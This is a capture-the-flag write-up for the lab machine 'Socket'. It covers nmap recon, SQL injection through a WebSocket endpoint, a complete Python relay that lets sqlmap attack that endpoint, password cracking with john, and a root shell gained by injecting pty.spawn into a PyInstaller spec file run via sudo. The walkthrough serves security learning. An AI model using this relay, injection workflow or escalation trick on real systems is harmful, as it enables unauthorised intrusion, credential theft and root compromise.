Socket

For this machine, I've started to take a lot more screenshots to better explain the steps I'm taking to get the flags.

User flag

Initial nmap:

$ nmap -sC -sV 10.10.11.206
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-05 08:50 CDT
Nmap scan report for 10.10.11.206
Host is up (0.14s latency).
Not shown: 847 closed tcp ports (conn-refused), 151 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_  256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://qreader.htb/
Service Info: Host: qreader.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.49 seconds

The server redirects to qreader.htb, so add that name to /etc/hosts for 10.10.11.206, then go to the site.

This site appears to be a service that converts text to QR codes, and vice versa. I looked at the page source for a bit and proxied traffic through Burp Suite, but I didn't find anything particularly interesting.

This site did offer a local version of the app, which I downloaded and ran. The app performs similar functions to the website, but it has a neat feature: it can check for updates.

Capturing the traffic with tcpdump and opening it in Wireshark showed that the update check is an HTTP Upgrade request to ws.qreader.htb:5789/version, i.e. the app talks to a WebSocket endpoint at ws://ws.qreader.htb:5789/version. That is a second hostname, so add ws.qreader.htb to /etc/hosts as well before testing it (port 5789 is outside nmap's default top-1000 range, which is why the initial scan didn't show it).

We can then use wscat to talk to the WebSocket endpoint directly and see if there are any vulnerabilities. There's an SQL injection vulnerability in the value sent to this endpoint.

Manual SQLi didn't get me very far, so the next thing I tried was sqlmap to speed the process up tremendously. sqlmap speaks HTTP, not WebSocket, so it helps to use the same HTTP-to-WebSocket proxy used in [[2023-03-11 htb-soccer|Soccer]], with a minor change to escape quotes correctly: the payload is embedded inside a double-quoted string here, so use '\\\"' instead of '\'' in the replace function.

I also needed --level 5 and --risk 3 (sqlmap's widest set of payloads and test positions) to find a result.
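The relay described above, as an added example that is not the writeup's own script (nor the Soccer one): a minimal HTTP-to-WebSocket relay in standard-library Python that sqlmap can be pointed at. The quoting problem mentioned above disappears because the payload is wrapped with json.dumps rather than a hand-written replace. Everything about the endpoint's message format is an assumption not stated on the page: that it reads a JSON text message {"version": "<value>"} and answers with one text frame; the listen address 127.0.0.1:8081 and the query-parameter name are likewise my choices.

```python
# Added example (not from the writeup): a minimal HTTP-to-WebSocket relay so
# sqlmap can attack a WebSocket endpoint, standard library only (RFC 6455
# handshake and framing). Assumptions the page does not state: the endpoint
# reads a JSON text message {"version": "<value>"} and answers with one text frame.
import base64, http.server, io, json, os, socket, struct, urllib.parse

WS_HOST, WS_PORT, WS_PATH = "ws.qreader.htb", 5789, "/version"
JSON_KEY = "version"          # assumption: the field the endpoint parses
LISTEN = ("127.0.0.1", 8081)  # where sqlmap is pointed

def build_ws_message(payload, key=JSON_KEY):
    # json.dumps escapes embedded double quotes and backslashes for us, the
    # step a hand-written .replace() in a proxy script is easy to get wrong.
    return json.dumps({key: payload})

def encode_text_frame(text):
    # One masked text frame; clients MUST mask (RFC 6455 section 5.3).
    data = text.encode("utf-8")
    header = bytearray([0x81])  # FIN=1, opcode 0x1 = text
    if len(data) < 126:
        header.append(0x80 | len(data))
    elif len(data) < 0x10000:
        header += bytes([0x80 | 126]) + struct.pack(">H", len(data))
    else:
        header += bytes([0x80 | 127]) + struct.pack(">Q", len(data))
    mask = os.urandom(4)
    return bytes(header) + mask + bytes(b ^ mask[i % 4] for i, b in enumerate(data))

def read_frame(read):
    # Parse one frame via read(n) -> exactly n bytes; returns (opcode, payload).
    b0, b1 = read(2)
    n = b1 & 0x7F
    if n == 126:
        (n,) = struct.unpack(">H", read(2))
    elif n == 127:
        (n,) = struct.unpack(">Q", read(8))
    mask = read(4) if b1 & 0x80 else None  # servers normally send unmasked
    payload = read(n)
    if mask:
        payload = bytes(b ^ mask[i % 4] for i, b in enumerate(payload))
    return b0 & 0x0F, payload

def decode_frame(data):
    return read_frame(io.BytesIO(data).read)

def ws_roundtrip(message, host=WS_HOST, port=WS_PORT, path=WS_PATH):
    # Handshake, send one text frame, return the first data frame's payload.
    key = base64.b64encode(os.urandom(16)).decode()
    request = (f"GET {path} HTTP/1.1\r\nHost: {host}:{port}\r\n"
               "Upgrade: websocket\r\nConnection: Upgrade\r\n"
               f"Sec-WebSocket-Key: {key}\r\nSec-WebSocket-Version: 13\r\n\r\n")
    with socket.create_connection((host, port), timeout=10) as sock:
        sock.sendall(request.encode())
        buf = b""
        while b"\r\n\r\n" not in buf:
            chunk = sock.recv(4096)
            if not chunk:
                raise ConnectionError("connection closed during handshake")
            buf += chunk
        head, buf = buf.split(b"\r\n\r\n", 1)  # frame bytes may already follow
        if not head.startswith(b"HTTP/1.1 101"):
            raise ConnectionError(head.split(b"\r\n", 1)[0].decode(errors="replace"))

        def read(n):  # exact read over the socket, reusing the leftover buffer
            nonlocal buf
            while len(buf) < n:
                chunk = sock.recv(4096)
                if not chunk:
                    raise ConnectionError("connection closed mid-frame")
                buf += chunk
            out, buf = buf[:n], buf[n:]
            return out

        sock.sendall(encode_text_frame(message))
        while True:
            opcode, payload = read_frame(read)
            if opcode in (0x1, 0x2):
                return payload
            if opcode == 0x8:  # close frame: treat as an empty reply
                return b""     # ping/pong/continuation frames: keep reading

class RelayHandler(http.server.BaseHTTPRequestHandler):
    # GET /?version=PAYLOAD -> WebSocket message; the reply becomes the HTTP body
    def do_GET(self):
        query = urllib.parse.urlparse(self.path).query
        params = urllib.parse.parse_qs(query, keep_blank_values=True)
        value = next(iter(params.values()), [""])[0]
        try:
            body, status = ws_roundtrip(build_ws_message(value)), 200
        except OSError as exc:  # ConnectionError and socket.timeout are OSErrors
            body, status = str(exc).encode(), 502
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    http.server.ThreadingHTTPServer(LISTEN, RelayHandler).serve_forever()
```

Run the relay, then point sqlmap at it, e.g. sqlmap -u "http://127.0.0.1:8081/?version=1" -p version --level 5 --risk 3 (and --dump once an injection is confirmed). Each HTTP request becomes one fresh WebSocket connection, the server's reply is returned verbatim as the HTTP body, and a connection failure or timeout is reported as a 502 so sqlmap sees a consistent response rather than a hang.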

We can then dump the database and get the admin password hash. The password is in the rockyou wordlist, so the hash can be cracked using john.

I attempted to ssh in to the user admin without success, so I had to go back to the database and see if I could find a username:

Looks like the admin is named Thomas Keller, so I started trying different usernames based on that name with the cracked password over SSH, and got in.

The user flag can then be retrieved.

Root flag

Immediately after getting user access, the first thing to check is what commands we can run using sudo (sudo -l). In this case, it's a custom script: /usr/local/sbin/build-installer.sh. We can read the script to see what it does.

This script is just a wrapper around PyInstaller, which is used to create an executable from a Python script. What's interesting is that according to the PyInstaller documentation, the spec file "is actually executable Python code. PyInstaller builds the app by executing the contents of the spec file." Since the wrapper runs under sudo, anything we put in a spec file it accepts will be executed as root.

So I created a simple python script to test with and ran it using the installer:

print("Test")

This worked and built correctly, so I then copied the spec file it generated from /tmp and made a change to it to get a root shell by adding this to the top:

import pty
pty.spawn('/bin/bash')  # runs while PyInstaller evaluates the spec, i.e. as root under sudo

I then ran the installer script on the modified spec file, which dropped me into a root shell, and got the root flag.